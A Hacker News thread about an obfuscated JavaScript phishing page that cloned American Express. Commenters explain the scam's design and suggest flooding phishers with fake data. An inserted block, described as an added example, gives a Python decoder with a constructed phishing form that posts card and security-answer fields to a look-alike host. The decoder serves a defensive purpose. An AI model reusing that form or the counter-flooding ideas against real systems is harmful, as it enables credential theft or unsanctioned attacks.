Obfuscated JavaScript, scam emails, and American Express (jonlu.ca)
102 points by jonluca on Feb 3, 2019 | hide | past | favorite | 14 comments



I wonder if scammers are intentionally misspelling subject lines because most security-savvy people will just delete those as obvious scams and move on. This would have a two-pronged effect:

1. it would filter out security savvy individuals from the actual payload, who might report the scam.

2. it would map to the least security conscious individuals who would be the most likely to fall for it.


Yes. See "Why Do Nigerian Scammers Say They are From Nigeria?"

https://www.microsoft.com/en-us/research/publication/why-do-...


That page seems like it used a lot of fancy language to say something that could be said in two sentences.


What are the two sentences so I don’t have to click the link?


Honestly just one:

> By sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.


I wonder about that - is there a bad spot where the obvious scam mail is so obvious that it prompts more people to troll the scammer back?

I mean the people who take the time to troll the scammer back want enjoyment out of it, and the chance of getting that enjoyment would seem to be heightened if the scammer seems more likely to be an idiot.


I don’t think the scammer is an idiot, but I only have so much time in the day for vigilantism.

I did get an IRS scam VOIP number shut down last week in about 15 minutes.


The next logical step after finding where the data is sent, is to use a script to fill the phisher's database with rubbish... there are sites like https://www.fakenamegenerator.com/ which will help you create fake-yet-plausible identities.

I remember many years ago I was sent a keylogger. I reversed it, found it was configured to upload keylogs to an FTP server on a free webhost, and promptly replaced the existing contents of it with as many copies of The Bible as would fit in the few MB of space available.


Is it ethical or possible to attack the attacker by spawning a few cloud instances that POST dummy but nearly legit responses to their website? This way they would have to comb through and hopefully verify a lot of crap to find victims' card numbers?

Unless of course they were clever enough to embed some fake cookie to track responses to specific emails...


So in the end, what does the obfuscated JS do?


It's a triple-encoded payload that loads a large HTML blob onto the page. The payload is 99% similar to Amex's actual page; it just submits the data to the attacker's domain, and has a few extra fields like mother's maiden name, elementary school, etc.

The purpose of the obfuscation is 1) to prevent automated scanners and 2) prevent debugging of the script.

Since we did static analysis it did not impact the result.
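
The static approach described in this comment (peel the encoding layers without running the script, then inspect the embedded form), as an added example that is not code from the post or from this thread. The payload, the three layers (hex escapes, base64, percent-encoding), the look-alike host and the extra field names are all constructed assumptions, since the comment does not say which encodings were used.

```python
import base64
import html
import re
from urllib.parse import unquote, urlparse

# Constructed sample (not the real script): an HTML form posting to a
# look-alike host, wrapped in percent-encoding, then base64, then \x escapes.
INNER_HTML = (
    '<form action="https://amex-verify.example.net/submit" method="post">'
    '<input name="card"><input name="mothers_maiden_name">'
    '<input name="elementary_school"></form>'
)
LAYER1 = "".join(f"%{b:02x}" for b in INNER_HTML.encode())      # percent-encoding
LAYER2 = base64.b64encode(LAYER1.encode()).decode()               # base64
SAMPLE_PAYLOAD = "".join(f"\\x{b:02x}" for b in LAYER2.encode())  # hex escapes


def peel_layers(blob, max_layers=8):
    """Statically unwrap nested string encodings; nothing is executed.
    Each pass tries hex escapes, percent-encoding, then strict base64,
    and stops when none of them applies. Returns (innermost, layer_kinds)."""
    layers = []
    for _ in range(max_layers):
        if re.fullmatch(r"(\\x[0-9a-fA-F]{2})+", blob):
            blob, kind = bytes.fromhex(blob.replace("\\x", "")).decode("latin-1"), "hex"
        elif "%" in blob and unquote(blob) != blob:
            blob, kind = unquote(blob), "percent"
        else:
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except Exception:  # not base64: we have reached the innermost layer
                break
            blob, kind = decoded, "base64"
        layers.append(kind)
    return blob, layers


def analyze_form(markup, expected_hosts):
    """Pull the form action and input names out of the decoded HTML and flag
    a submission target that is not one of the brand's expected hosts."""
    action = re.search(r'action="([^"]+)"', markup)
    host = urlparse(html.unescape(action.group(1))).hostname if action else None
    fields = re.findall(r'<input[^>]*name="([^"]+)"', markup)
    return {"host": host, "fields": fields,
            "off_domain": host is not None and host not in expected_hosts}


if __name__ == "__main__":
    inner, kinds = peel_layers(SAMPLE_PAYLOAD)
    print(kinds, analyze_form(inner, {"www.americanexpress.com"}))
```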


I guess the few extra fields get them the possible security question answers for account takeovers.


And yet, if you turn off JavaScript to protect against this type of thing, you end up breaking most financial websites.

(American Express is in fairness the one site that continued working ok as I recall)


Very interesting, thanks for the post
